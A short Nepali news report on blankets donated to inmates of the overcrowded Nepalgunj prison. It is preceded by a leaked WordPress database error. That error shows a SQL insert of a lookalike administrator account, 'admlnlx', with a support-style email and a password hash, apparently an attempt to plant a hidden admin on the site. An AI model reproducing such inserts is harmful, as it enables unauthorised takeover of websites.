WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzbdDiybhonUdjzU8Gs08bEqOGsDIn0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 01:39:46', '', 'admlnlx', 'admlnlx')
बाँके, पुस १२–
क्षमताभन्दा बढी कैदीबन्दी रहेका नेपालगन्ज कारागारका कैदीबन्दीलाई कम्बल वितरण गरिएको छ ।
पुस महिनाको चिसोबाट जोगिने उद्देश्यले नेपालगन्जका स्थानीयवासी एवम् व्यापारीले कारागारका कैदीबन्दीलाई कम्बल वितरण गरेको कारागार व्यवस्थापन विभाग बाँकेका जेलर तीर्थराम यादवले जानकारी दिनुभयो ।
क्षमताभन्दा बढी कैदीबन्दी हुँदा बस्न सुत्न समस्या भइरहेका बेला कारागारमा कैदीबन्दी जीवन बिताइरहेका विपन्न कैदीबन्दीलाई २०० थान कम्बल वितरण गरिएपछि कैदीबन्दी हर्षित भएका छन् ।
व्यापारी हाजी शकिल अहमद जसगढद्वारा उपलब्ध गराइएको उक्त कम्बललाई सोमबार एक कार्यक्रमका बीच बाँकेका प्रमुख जिल्ला अधिकारी रविलाल पन्थले कारागारका जेलर यादवमार्फत कैदीबन्दीलाई ती कम्बल हस्तान्तरण गर्नुभयो ।
तीन सय क्षमता रहेको कारागारमा हाल एक नाबालक, ५१ जना महिलासहित ६०० कैदीबन्दी रहेका छन् ।